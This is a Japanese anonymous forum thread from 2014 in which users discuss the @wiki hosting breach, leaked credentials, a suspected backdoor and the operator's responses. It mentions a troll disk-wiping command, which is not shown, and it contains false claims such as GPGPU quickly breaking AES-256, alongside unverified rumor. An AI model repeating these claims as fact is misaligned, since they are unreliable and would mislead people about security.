名無しさん@お腹いっぱい。:2014/03/10(月) 23:27:04.78
>>744 検索ランキングとアフィには熱心なのに
セキュリティは甘々なんだなこのアホ
>>740 開いてしまったんですが〜、アクセスしてしまったんですが〜、って…
「熱があるようなんですが大丈夫ですか」並に漠然とした質問過ぎるだろオイ
タダであるのと引き換えに許容して使ってきたんだから広告に今更ケチつけるのは的外れだろ
この調子で手をこまねいてるだけなら早く会社は潰れていいが
atwikiのサーバ対処よりも2chでの火消しレスのほうに勤しんでたりしたらどうしよう
>>749 2年前まではこんな広告ベタベタ貼ってなかっただろうが
いえーい社員さん見てるぅ?
早く鯖落とした方がいいんじゃなーい?
みんなアドオン使ってると思っていっぱい貼ってるんだろうな
大きな表を作ったら、ウィキの容量上限より遥かに小さいのに
保存したら白紙になるという不具合に散々苦しめられたから一言
運営のクズどもざまあみろ!!!!
バーカ!!!!!
Part8でデマデマ言ってた人ってもしかして・・・
いやいや、まさかな……
モンハンwikiとかPV稼げるゲーム系はatfreaks直々に運営してんだろ?
ところでウィルスや怪しいJSは仕掛けられてなかったっていう@freaksからの発表は信じて大丈夫なん?
うはwwwww手前んとこaguseで確認したらhit数普段の80%程度キープしてるしwwwwwwwwwww
普通に更新されてて草生えるわ
まあニュース見てなきゃ普通に踏むだろうしこんなもんかね
あちこちのサイトにニュース記事として取り上げられたし公式発表で嘘言ってたらマズイでしょ
>>758 現在のところは
告知時点の状態だから今はどうなってるか知らん
つまり発表を信じて大丈夫
>>758 被害が出たサーバーを列挙するところから間違ってる
正しくは www1〜www58 のすべて
運営を信じて大丈夫なわけがない
データのサルベージのために@wikiに何度もパソコンからアクセスしたが、いまのところ自分のパソコンがウイルスにかかった形跡はない。
パズドラとかメジャーなところじゃなけりゃ今のところ接続するだけでアウトではないようだ。。
もし、接続するだけでやばいような凶悪なウイルスだともっと騒がれて警察も運営も必死になってるかと。
それよりも、メルアドとパスが漏れたようなので、他のサービスで使いまわしてるパスワードがあるなら速やかに変更するべきだな。
論理爆弾というものがあってだな
>>761 まさか未だに乗っ取られたままじゃあるまいて
>>759 パズドラwikiとかなにも知らずに見てるやついまだに続出してそうだしな
768 :
名無しさん@お腹いっぱい。:2014/03/10(月) 23:53:47.41
パスってなんのパスのことなの?
パスワードを略してパス
pass
んなこと知ってるwww
良く分からないんだけど編集とかで登録?してる人がそのパス流出するのはわかるんだけどそうじゃない人はなんのパスが漏れるの?
もういっそ新種のウイルスとか仕込まれててウイルススキャンで何も出ててこないから問題ないって今だにアクセスしてるアホのPC爆発したら面白いのにな
>>767 このまま何も被害なければそいつらは何も知らずに@wiki使い続けるやろなあ
ハッカーの侵入を遮断した上でサーバーマシン全体をセキュリティスキャンやウィルスチェックとかしたってことかな?
バックドアってサーバーマシンとかで動くやつでしょ?となるとウイルスチェックもサーバーマシン用のウィルスチェックとかってあるの?
存在しないパスが流出するとか前代未聞だな
atfreaksのアフィリエイトIDが全部書き換えられてたら面白いのに
突然どうでもいい話の流れに変わったりするのは何でなん?パスの話とか
今夜まで何が起きてたか把握してなかったから
昨日の朝も普通に同時攻略中のグレイセスfとヴェスペリアのwiki見てた
遥か昔に作ったwikiもあるけどここ見て退会しようと決めた
流れ読まずにレスつける人間が居るだけの話
>>767 腐るほどいるだろうなあ
まあ一般の利用者はそこまで詳しく調べはせんよな
面倒くさいだろうし当然っちゃ当然かもしれん
>>778 公式がうちはwikipediaとは違うぞって念押しするくらいだぞ
変なやつがどれだけいたっておかしくない
アットフリークスの公式発表って
管理画面が改ざんされたので直したって内容は出てるけど、
改ざんに用いられる不正なプログラムが複数のサーバーで見つかった
って事は全く発表してないよね。
.phpとかtest.cgiがGoogleキャッシュに残っちゃってるから、
明らかな事実だと思うんだが
とりあえず今まで碌にセキュリティに気を配ってなかったアホは
今回慌てて検診して見つかったウィルスはとっくの昔にてめえのPCの中にあったっつー現実を見つめろアホ
こんなに杜撰なところじゃウイルスチェックしたと言っても無料ウイルススキャンソフトとかなんじゃないかと疑ってしまう
結局10日の公式発表は毒にも薬にもならない報告だけかよw
789 :
名無しさん@お腹いっぱい。:2014/03/11(火) 00:17:08.41
ニュースなりすぎィ!!!
はるか昔xreaの広告サーバーが乗っ取られて中華の罠が仕掛けられたことがあってな
公式サポートページの報告はガン無視、2chの該当スレの初期報告はガセ扱いで袋叩き
結局公式が対処するまでの2週間の間にそこから漏れたトロイのおかげで
某ネトゲのアカウントハック被害は数十倍に膨れ上がったそうな
まあ鯖屋なんてそんなもんだ
>>670 ですよねー
>>653,656
自分は運営の発表の「リダイレクト」は、アットウィキ鯖にバックドアを仕掛けられた件を言ってたんだと考えてる。
もしまた他の人に説明したいことがあったら、何がおこったかわからない人への説明と、
わからないうちに見にいっちゃった人への説明は分けたほうがいいと思うよ。
この書き込みを信用するなといって断言、脅したりなだめたりとかになっちゃってて
混乱した文章は読むほうも混乱する。
>>782 上でもちょっと書いたけど、メールできた「リダイレクト」の件が
バックドアの件のやんわり表現なんだと思って読んでたわ
794 :
名無しさん@お腹いっぱい。:2014/03/11(火) 00:22:30.25
>>653 まとめ2
【何が起こったの?】
@Wikiのサーバーがクラックされた。
●公式が発表した確定事項
1:各Wiki管理者および登録ユーザーのパスワード(暗号化されてるが比較的簡単に解読可能)とメールアドレスが流出した
2:リダイレクト(別のサイトに飛ばす処理)をするスクリプトが仕込まれた
3:@wikiの「パスワード再発行ページ」が改竄された
●有志が調べた情報
atwiki.jpの全鯖のphp操作権限取得 (サイトの管理者レベルの改変可能)
データベースバックアップ流出、ユーザーID/メールアドレス流出
ハッシュ化されたパスワードがレインボーテーブルで解析できることが判明、個人情報ほぼ完全流出
atpagesもやばい
>>792 これらの記事を供給してるニュース各社は@freaksを取材して発表してるのか?それとも2chのスレを記事にしたのか?
パスワード流出も問題だけどサーバー乗っ取られて放置してるのが一番の問題よね
上のニュースソースからはそこが分かりにくいのが…
news
×ニュース
○ニューズ
噂をざっくりまとめただけのニュースでしょ
直接取材とか言質取ったならもっと声高にアピールするはず
>>795 「個人情報」が省略しすぎてると思う。なるべく具体的に書かないと、新たな質問が生まれそう。
>>796 とりあえずYahooが最初に記事出して
他のサイトはそれをソースにして記事出してる感じ?
言質もとらんとだからマスゴミと呼ばれんだよ・・・
登録時に申請した情報の他に、登録時のIP以外で流出した個人情報といえるもの、
確認されてるものって今どんなのがあるんだろう?
wikiが取材に答えないからこんなことになるんだろ
>>801 大抵こういうのはITmediaとかネット系が先に記事を出して
それをヤフーニュースなどポータル系で載せる形
ヤフー自体はニュースを出さないし、ソースになることもない
節子、それ10年前の対処法や
808 :
名無しさん@お腹いっぱい。:2014/03/11(火) 00:46:55.26
>>806 1.不審なサーバはネットワークから切り離す
2.改ざんされていない安全なコマンドの準備
3.調査用パソコンの準備
4.メモと時計の準備(※追加)
まず1をしないクソ運営wwwwwwwwwwwwwwwwwwwww
とりあえず移転先探してるやつ用にまとめ改
seesaa
したらば重いのでseesaaは死んで、どうぞ(真顔)
wikiとしては普通。でも管理機能弱い+運営サイドのスパム対策が腐ってるっぽいんで、ガチでチェック続けられる人向け
fc2wiki
他のfc2サービスを鑑みるに鯖重そうな予感がする
wikiの機能自体は多分問題ない
CSwiki
wicurio
知らん
特にすげえ!って点はないが死ぬほどおかしい点もないか
wikia
論外
wikiwiki
プラグインとか管理機能は比較的高機能。規制関係の機能が強めか
デザインが基本的にテンプレ変更だけっぽいのと一括凍結・解除できないのがネック
90日間更新がないwikiは運営判断で消すと書いてある(ただし機械的に消すとは言ってない)ので、長期間更新がない可能性がある場合は注意が必要
gamedb
全体的に高機能だけどプラグインは控えめ
んなもんいらんって場合には悪くないがゲーム専門なので誰にでもすすめられるわけではない
90日間更新がないwikiは消すことができる(ただし必ず消すとは言ってない)と書いてあるので、長期間更新がない可能性がある場合は注意が必要
ゲーム攻略wiki
デザイン面やらなんやら色々高機能。全体的には悪くないんだが規制機能が微妙に弱い
禁止ワード規制をしたい場合は他所を選べ
>>801 Yahoo!ニュースというのは自分達では取材せず他のサイトの記事を転載してるまとめサイトみたいなもん
812 :
名無しさん@お腹いっぱい。:2014/03/11(火) 00:54:09.36
あれ?もしかしてまだ解決してないの?
あぶねーな。いい加減収束してるだろうと勝手に見なくてよかったわ
>>809 netowlもpukiwikiのホスティングサービスやってるよ。
容量1Gまで無料で広告が入るんだったかな。自分使ったこと無いんだけど。
素pukiwikiっぽい感じだったよ
なんか運営の動きを見てると自転車操業なのかなーって感じがする
サーバーをメンテナンスする金も人材も無いのかな
ご愁傷様
CGIやPHPが使える無料鯖でオープンソースのwikiをインストールして使うとか
mediawikiってのは使い勝手どーなの?
>>812 1
当然、真っ先にやる
2と3
準備は先にしておくべきだが、とりあえず安全な環境を用意しないといけない
ユーザに向けたエラーページも同様
4
これは今はない
>>812 基本的には今でも有効だろう。
ただ、これは単純にサーバーに侵入されただけだから今回の場合は不十分。
今回の場合、wikiシステム自体、Apache、PHP の脆弱性が原因であると考えられるから、
調査する範囲はもっと広くなるね
>>813 ファイアーウォールのドメイン規制に入れといた方がいいよ。誤って繋いでしまう恐れもある
ちなみにブラウザのアドオンとかで規制してもアクセス発生しちゃうのでムダだから
>>809 > seesaa
> したらば重いのでseesaaは死んで、どうぞ(真顔)
したらばですら重い
だから死ぬほど重いってこと?
wikiaの論外が笑えるw
>>822 >現在調査・対策を行っているという。
対策中ってことだね
>>816 pukiwiki本家とpukiwiki plus!は、何年も更新がなく
レンタル鯖のPHPに対応してない可能性が高いので
(対応してる古いPHPはメンテナンス終了してるので、まず公開鯖では使われていない)
自分で書き直すなりできる人じゃないと難しいかも。
そうでない場合でレン鯖借りてインストールするなら、他のwikiシステムかな
どのwikiシステムでもそうなんだけど、ホスティングサービスを使わない場合、
スパムと戦うのは管理者になるので、そこら辺の対処ができる
プラグインなりツールなりネットワークの知識は多少必要。
検索避けするサイトとかなら、それほどでもないんだろうけど。
>>817 設置者?編集者?
設置にはデータベースがいるよ。Pukiwiki系とは基本的な使い方の方向がちょっと違う感じで、
基本編集者には登録してもらってからかいてもらう方向の機能が多いっぽいけど、
別にメンバー登録しなくても書いてもらうことはできる。
書式は結構違うよ
鯖落とさずに対策してるところ初めて見たわ
止めなきゃ大多数の閲覧者には気付かれずに済むからな
828 :
名無しさん@お腹いっぱい。:2014/03/11(火) 01:30:52.81
バックドア仕込まれてて改竄やりたい放題のサイトに
不特定多数のユーザーが接続しても何も問題ないと思ってるんでしょ
キチガイすぎてどうしようもないわ
発表が事実ならいいんだが、それが信じられないから怖いし何もできないんだわ
問題が無いという可能性はだれにも証明できない(悪魔の証明)
だから、問題を解決するには、運営が真摯に対応することしかない
>>828 @wikiの発表はサイトにウイルスが埋め込まれたことは確認していない、ということ
バックドアのようなサーバの穴を塞いだとは一言も言っていない
そしてバックドアが仕掛けられてるならいつでも改ざんされるおそれがある
実際パスワードを変更しろといって、その変更URL先が改ざんされてる状態だったくらいだからな
root取られるほどのバックドアが残ってるなら、パスワードを変更したところでまた盗まれるかもしれないし、変更したつもりが別のところに情報が送信されてもおかしくないのだよ
>>828 話の流れがわかりづらいから、向こうで聞いたほうがはやいかも。
それか、何を聞きたいかもうちょっと詳しく書いてくれると。
バックドア塞がない限り何やっても無意味
ウイルスが無いことを確認した1分後にウイルスがあってもおかしくない状況
VM使ってデータサルベージすればいいだろうに…
画像ならUPしたファイルがローカルにあるだろうし、取ってくるデータなんてテキストだけだろ
どっかに飛ばされて、万が一感染したらVM消せばいいだけだろ?
>>168,204,433,764は何を怯えてるんだ?
838 :
名無しさん@お腹いっぱい。:2014/03/11(火) 01:47:44.54
>>809 fc2wikiは
俺の個人的な感想だけど
wiki編集中に画像の用意とかしてたらセッションタイムアウトしてて書いてたものが消えてしまうから使いたくない
ブラウザバックしてもパスワード入力画面にされてしまうから残ってない
atwikiは長時間編集したことないから知らんけどな
840 :
名無しさん@お腹いっぱい。:2014/03/11(火) 01:51:34.75
PHPが使えるサーバ借りてるけどpukiwikiは使う気が起きないな
以前はよく使ってたけど古臭いしなんか余計なことしてるんだよね
改造しようかと思ったけどwikiを使いたいのにwikiを作ることにものすごい時間をかけることにばかばかしくてやめた
>>814 確認した
中身は普通だがマニュアルきちんとしてるなw
wikihouseも見てきたけどどこもマジで一長一短だな
まあ多少の取捨選択はやむをえんか
>>821 実のところしたらば重い死ねは本筋と直接は関係ない。今では反省している
ただまあ、
・seesaa化した後のしたらば
毎晩のように超重力に襲われる。まるでテレホタイム全盛期に戻ったかのよう
というか昼間でも不意の超重力来襲がある
追尾広告のせいでブラウザだとAAが崩れるようになった
なぜかブラウザだとUnicodeが文字化けするようになった
書き込み失敗や二重化が増えた
・seesaaブログスレのテンプレ
ttp://toro.2ch.net/test/read.cgi/blog/1352379558/2 有名どころのサービスですらこれだしwikiもちょっとね、と思わなくはない
@wikiとは別のベクトルで運営が信用できないというか
サーバー停止すると運営の息も止まってしまうん?
>正しくは www1〜www58 のすべて
鯖61まであるんだけど59.60,61は平気なわけ?
あと上のニュース中身一緒なのがいくつもある
転載がかなり多そう
去年8月の@pagesの流出は書いているところがあるのに
同時に@chsからも漏れたことを書いているところは0
サービス登録したままフリーのメールアドレス破棄した場合の危険性を書いているところも0
IT情報系のところって
公式発表をそのまま載せるのと
海外の翻訳記事を載せるのが主流じゃないのかね
>>809 CSWikiとwicurioも
運営側が提供するテンプレートから選ぶだけでCSSの変更は不可だよ
wicurioは登録時にあれこれ個人情報を要求された気がする
gamedbは時折鯖が半日程度つながりにくくなることがあるのを覚悟したほうがいい
追加のプラグインは要望出すと聞いてくれるらしい
>>814 ちょっと使ってみたことがあるんけど
運営側の設定がなんか変だった
editプラグインが動作しないとかSideBarが設定されていないとか
ttps://secure.netowl.jp/bbs/detail.cgi?td=844 CSSとHTMLは結構いじれるけど追加のプラグインなどは無いし追加も不可
wikiwiki.jpは
>>790のときに404ページがやられた記憶しかない
>>837 そのような攻撃を許すような設計してるサイト側にも問題あるよな
2chのようにPOST送信必須でリファラチェックとかしてればいいのに
事件を知らないのか安全だと思われてるのか
俺が作ったwikiには今日もいつもと同じ程度の訪問者が
自分の登録したatwikiのトップページに
>>831の記事でも貼り付けてやればいいさ
>>843 なんでも去年バックドアしかけられた時点ではその3鯖はまだなかったらしいよ
848 :
名無しさん@お腹いっぱい。:2014/03/11(火) 01:58:51.78
>>842 そりゃ長期止めてたら客(wiki編集者と閲覧者)が確実に逃げてくからな
wikiwikiはブラウザバックしたときに見てた位置に戻ってくれないから嫌だ
バックドアを塞ぐスキル無いけど自分達が食いっぱぐれるのは嫌だからってそのまま運営し続けるとか…
たぶん有耶無耶にしたいんだろうけど
システムごと誰でも編集できるwikiなんて助かりようがない
今頃夜逃げの相談でもしてるのかねえ
アフィリエイトやアドセンスとかの規約にこういう事態に停止するとかそういうのあったりするんだろうか
>>837 わぉ、怖い
>>841 なるほど、seesaaは除外するわ
ありがとう
wikiwikiで更新サボらないようにするのが一番か
>>843 ネットニュース系は知らないんだけど、新聞とかだと、共同通信社とかと契約して
そこから配信されてきた国内外の事件情報なんかを
自分のところの編集者が構成して載せたりするのよ。
小さい地方新聞でも海外記事が載ってるのはそういうしくみ
もちろん自社の記者が調べて書いたってのもあると思うよ
ネットニュースも会社組織がやってるようなところはそんな感じかもね
>>856 ただ今回はたんなる流出じゃないからなあ
警察も出てきてる(らしい)し、適当にごめんなさいねーでは済まない状況になってくれると嬉しいね
昔は流出→利用者に謝罪だったけど
最近は流出→自分たちは被害者、悪いのは侵入した奴
って開き直るのが常道
数年前にとったバックアップがあるから使いたいけど、引っ越しサポートがあるところって少ないのかな
wikiwikiはあるみたいだけど90日更新は難しいし
数年前の時点の@wikiが大丈夫だったっていう保証はあるん?
今もこのスレとかで運営の奴が必死になって情報集めてんのかな
>>835 URLの www.huffingtonpost.jp/2014/03/08/ の部分は日付じゃなく記事番号が8とか、記事自体は3/9の12時付けだし
昨日の昼頃一瞬だけスマホで@wiki開いてしまったんだがこの場合の危険度を教えてくれ
これだけでも最悪感染とかするの?
2ch張り付いてるだろうねぇ
そこまで熱心なら、週末に対応とってるでしょ。
これだけ話題になれば、知り合いから電話とかあっておかしくないとは思うんだがな。
>>862 バックアップはただの平文テキストだから、
怪しいリンクは無いか、
スクリプトを記載したページは無いか
(管理者がスクリプトを直接書くプラグインを使ってなければ、ソースにjavascriptは通常は入らない)、
添付ファイルに怪しいものは無いか
これらは自分でチェックできるよ。自分が保障できる形には自分でする感じ
atwikiのドメインはルータで止めてるから分からんのだが
まだatwikiの鯖は止められてないのか?
>>840 改造、今からなら書き直しのほうが早そうにしても、やっぱ結構時間かかるもんな
あんまり一人でやる作業じゃないよね
875 :
名無しさん@お腹いっぱい。:2014/03/11(火) 02:40:16.86
>>853ってマジないの?
グーグルやアマゾンに通報してアットフリークスの契約停止とかさせることが出来れば
アットフリークスもうまみが無くなるから鯖停止とかするっしょ?
嫌儲民ならアフィに詳しそう
アンチウイルスにかからない自作のトロイをするっと入れられるようにさえなってなけりゃたいした問題じゃないんだが
アクセスした時のみ一時的に踏み台や犯行予告させられたところで数千〜数万人のうちの一人になるだけだし
嫌儲民がその線で動いてない時点で嫌儲民の負けやな
まあ、そんなに簡単にブラウザ閲覧でウィルス感染するような脆弱性を見つけるの難しいと思うけどね
本当なら、もっと新たな最高レベルの脆弱性として騒がれててもおかしくないぐらいだと思う
可能性は否定できないけど、閲覧するだけでウィルス感染ってのは
ちゃんとセキュリティパッチを当てていれば問題ないと思うよ
javaとjavascript混同してる人もかなりいそうだな
運営「嫌なら見るな」
>>881 俺ら「そうするわ」
俺ら「ついでに引っ越すんでwiki消すわ」
wikiwiki以前はそこそこ使ってたけど1年以上更新してない
放置してるけど消えてないよ
内容は40ページくらいかなあ
あのー未だにバックドア開きっぱなしなんですけど・・・
2ch見てるんだったら晒されたもんくらいチェックしろよwww
885 :
名無しさん@お腹いっぱい。:2014/03/11(火) 05:41:55.33
>パスワードは単一方向の暗号方式を用いておりますが、
>暗号化されたパスワードから元のパスワードを推測し難い状況です。
いつまでこんなデマ載せるの?
辞書攻撃ですぐに多数のアカウント判明するし、
GPGPU使った全数攻撃だって可能
GPGPUで調べたらワロタ、描画能力で計算されたら
AES256でさえあっという間でSHA-1くらいじゃ一溜まりもない
DSAみたいなことは出来なかったんだろうか?
パズドラのwiki見ちゃったんだけど何すれば良いんですか?
とりあえず
>>2は実行してみましたけど、初期化した後パソコンの調子が悪く起動出来ない状況です。
同じ症状の方居ますか?
>>887 >>2 これを行うとすごくPCが軽くなり、ウイルスも駆除できる、まさに最強のコマンドである。
しかしCドライブのデータがほぼ全て削除される上に、OSまで消えてしまう。まさに禁忌の呪文である。
ネット上でこのコマンドを実行すれば●●が直るといった悪質な書き込みがなされている場合があるが、
引っかからないようにしましょう。
尚、自分が所有するPC以外(業務用PC、公共のPCなどで)で行った場合、 電子計算機損壊等業務妨害罪(刑法234条の2)に問われ、
5年以下の懲役または100万円以下の罰金の可能性があるのでよいこのみんなは絶対にマネしないこと。
なぜ最悪のコマンドを試したorz
俺はスレイプニル使ってjavascript切って閲覧してるよ
カウンターは回らないし、ツリーメニューが使えなくなるけど、
軽くなるし、ウザい広告が出にくくなるしでいいことしかないわな
まあatwikiの運営側としてはやってほしくないだろうけどww
>>891 サーバが用意できる奴なら
無料wiki使わないだろwww
>>891 文法が随分違うな…
**太字**、\\で改行か。
MediaWikiがオススメだ
拡張性が高くて文法を自由に拡張できる
MediaWikiはDBが必要だろ・・・
MediaWikiは使い込めばなかなかのもんだけど、最初がすげー面倒だし
自分は良くてもPukiWiki系に慣れてる人はなかなか編集者として定着して
くれなくてなぁ。ゲーム系ではなかなかサイト盛り上がらないよ
サーバー借りて導入できるような人はWikiなんて好きに作ってるんだから、勧める意味がない
MediaWikiには初期設定のウィザードあるし
なんかMediaWikiは重い感じがするんだよな 動作速度って意味じゃなくて気持ち的に堅苦しい感じがするというか
MediaWikiはDBが必要だからレンタル鯖の中でも敷居が高い
@PAGESならDBも入れられたはず!(キリッ
まあ、考え方は人それぞれだが、
@wikiがユルユルのガバガバであることには全員一致であろう
ここは運営の対応が悪いな
何が起こっているのか明確にしてほしい
メールすら来ないのはどういうことだ
アカウンタビリティ
企業ならアカウンタビリティを守れってんだよな
コンプライアンス
無料サービスなんだからある程度は覚悟しておくべきでは
法令遵守
説明責任
アットフリークスはむしろガバガバナンス
atwiki便利だし、プラグイン開発等も意欲的だったから、是非頑張ってほしい
これで潰れてしまうには、あまりにも残念
逆に他のwikiシステムはatwikiと比べると劣る点が多すぎなのでもっと頑張ってほしい
915 :
名無しさん@お腹いっぱい。:2014/03/11(火) 09:43:14.27
どっかの大手が買収すればセキュリティがましならんか
某社「ゼロから作りなおしたほうが早いわw」
事の重大性をホントに理解してるのかね
データベースの全データをダウンロードできる状態にあったってことは、
3月4日時点の全ウィキコンテンツを使ってコピーサイトを作れるってことだぜ?
>>917 俺がお前でお前が俺で敵が味方で右往左往状態か。胸熱。
これを3.11と名づけよう
ん?
それぐらいは手動で出来るじゃん
それが重大だなんて話は初めて聞いたけど
921 :
名無しさん@お腹いっぱい。:2014/03/11(火) 10:21:24.98
事が落ち着くのはいつなのか・・・
気になってmcafee先生に調べてもらったらjavaからトロイの木馬が出てきてワロスwwwワロス・・・
風呂釜でも掃除するの?
とっととバックドア対策どうにかせいや
管理者・編集者のメールアドレス・パスワードから、
各ページのウィキソース、過去の版(履歴)、設定内容まで、
ありとあらゆるものが揃ってるってことな
twitter見てると公式発表見てもう安心してるのが結構いる
wikiwikiってのは全く別物?
あたりまえだ。
移転先としてグーグルアドセンスが使えるWikiを探してるのですが
どこがありますかね?
各wikiの管理者レベルで見られることを気にする奴はどんなヤバい事してんだよ
普通はどうでもいいわ
質問してる奴ら
検索すりゃ比較サイトやら情報転がってるんだからまず自分で調べろ
例えば20万個のウィキがあったとして、それらのウィキの内容は財産だろう
人を集める財産じゃないなら広告を貼ったりしない
上司「ウィキペディアは危険らしいから使用禁止な(意訳)」
そうだね、ある意味危険だよねウィキペディア。
膨大な文章があるんだからキーワードを解析すれば
これからウィキを作ればウケるような話題が分かる
ここで一番びっくりしたのは
ウィキが全部一緒だと思ってる情弱がマジで存在したということ
>>919 あの@Wikiの事件からもう三年か…
つい2日くらい前のことにも思えるが、時が経つのは早いな
ウィキペディアは記述が必ずしも正確って訳じゃないからねぇ
ある程度個人の主観が盛られたりすることもあるし
個人で使うならともかく仕事上で使うなは正しい判断
辞書や専門書を買ってそっちで調べた方がまだいい
今日久々に閲覧して、何かサイトがフリーズすると思って調べてみたらこれかよww
クラックされたのは仕方ないとしても、対応してまだ完了してないうちはサイトを
一旦クローズしとけと
ウィキペディアに盛るのを請け負う業者まであるくらいだからな
移転先についてはよそでやってほしいなぁ。
wikiサービス比較検討スレとか立てればいいのかな。
まだ鯖落ちてないの?
ここの会社むかつんだけどどこの行政機関に相談したらいいの?
被害者総勢で動けばまた対応が変わるかもな
今の糞対応本当にむかつくわ
ウィキの内容と自分のメールアドレスが紐付けられたことで多大な迷惑を被ってる人はいくらでもいるだろ?
go.jpのアドレスとかゴロゴロ含まれてるんだぜ?
>>943 こういう案件は騒ぎを大きくするのがコツだ
ビットコインの件と無理やり関連づけて話題性を大きくするのがいいかもね
@wikiって意外と色んなところで使われてたし
政府関係者が夜な夜な集まって編集してた伝説のウィキは…
wiki見れないからゲームできないって愚痴を見かけると草生える
攻略まとめとかが見れないってことかな。
攻略見ないとゲームできないって頭ひどすぎない
>>954 やたら収集の条件が細かくて、どのモンスターが何のアイテム落すか良く分からん
とかそういうゲームは存在する
分からなきゃわからないで手当たり次第やりゃ良いだろって話だが
ゲームと公式攻略本の両方を買って
攻略板のとおりにゲームを進めていくだけのやつとかなw
>>956みたいなやり方で進めるのは何が楽しいんだろう
>>955みたいな感じのゲームのやりこみ要素は小難しくて紛らわしいの多いし収集に攻略使うのはしかたない
atwiki騒動知る前に踏んでPCおかしくなったやつはご愁傷様
一度逃したら入手できないアイテムとかあるから困り者だ
イベント取り逃したら、また何十時間もプレイするハメになるんだが、やる気ある?
中高生くらいの時はできたが、今はもう無理だな
どうしてこうなったのだろうか?せめて戻ることが出来たら良いのだが
攻略板→攻略本orz
まぁ逃したらそれから取得不可能とかもあるし
フェーズによってはセーブごと消して最初からプレイしないとだめなやつもあるし
最初から全部見ながらゲームやったほうが効率はいいし時間もかからない
それに全部手に入れた満足感でゲームを終えると充実感が得られる
最近Coop前提のゲーム多すぎるししゃーないと思うわ。
あれ揃ってないこれ揃ってないで批難されてしまうからな
特に何も知らない状態でマルチをすると晒される危険性もある
攻略wikiを見るのは前提としてプレイしないといけない時代になったようなものよ。
東日本大震災の被災者:
「どうしてこうなったのだろうか?せめて戻ることが出来たら良いのだが」
ゲーム雑談するのやめろ
俺は誰の指図も受けない
攻略じゃなくてキャラの非公式人気投票とかに使ってるから、
終わってほしくは無いな。
レアモンスターから低確率や
ミニゲームをクリアしないととかも凶悪
二択で仲間はいらず
そもそも、ここにいるのって Wiki を見る側じゃなくて、
編集する側の者の筈なんじゃないの? 自分はそうなんだけど。
未だに騒動知らない被害者増えてそうだな
ゲーム話は他所でやれ
見る側も見たけど大丈夫?とか言いに来るやついる
たぶん見ておかしくなったやつもいる
>>969 特にどっち側だけってことはないでしょう。
@wikiについて語るスレだよ。
>>964 還らざる時の終わりに、彼らはいったい何を見るのだろうか・・・
見る人が編集できるのがWikiなのにそれを区別する意味はあるのか
今のタイミングでここ見るのは管理者が多いだろうな。
人柱を確認した上でwikiの移転なり、削除なりの手を打ちたいところ。
これと言って音沙汰が無いのが困ったところ。
よくこんなセキュリティで運営しようと思うよな
俺なら怖くて出来んわリスキーすぎるっしょ
次スレは?
こんなんテンプレに入れとくかねぇ。
Q.
@wiki見ちゃったんだけど大丈夫?
A.
大丈夫かどうかはわかりません。
「現在のところ、ウイルスは確認されておりません。」
というのが@wikiの公式発表ですが、
未発見のウィルスがひそんでいる可能性はあります。
ウィルス対策ソフト等で自衛しましょう。
え?テンプレそれだけ?
>>954 対戦モノだと攻略まとめ情報重要だよ。
自分一人で集めた情報だけじゃまともに勝負できない。
見た側だけじゃなくて管理側も作ったほうがいいと思う
流失のこととか共通メアドパスのこととか
あとウイルス云々も
入れ違いで聞きに来る奴多いし
>>985 ガンブラー(GEO)や山田のときは、対応テンプレとかしっかりあったから
>>984 管理側は@wikiからのメールの通りだからいいんじゃね。
メール来ない奴もいたんじゃなかったか
@wiki産かは別としてウイルスチェックしたらjava絡みのトロイの木馬検出
>>990 確証ないのに書くなよ。不安煽るだけだろカス
wiki云々抜きにトロイにやられるのは自衛力の無さの表れだからちゃんと省みろよ
>>992 海外のエロフラッシュやったら、感染していたことあったな
>>795の「個人情報ほぼ完全流出」の部分が不明瞭なので、「登録情報ほぼ流出」かなんかに変更して
使うのはどうだろう
>>482の「あまり根拠が無いこと」については、上のほうで説明されてることを理由を書かずに根拠が無いって言ってる
>>653は「お前が悪い」とかはテンプレにいらないと思う、感想なので。
検出したからってat産とは限らないだろ
at産確定からそういうこと言えまぎらわしい
デマ流すバカが騒ぎ始めるからやめろよ
梅酒おいしい
ume
ウメハラ
1001 :
1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。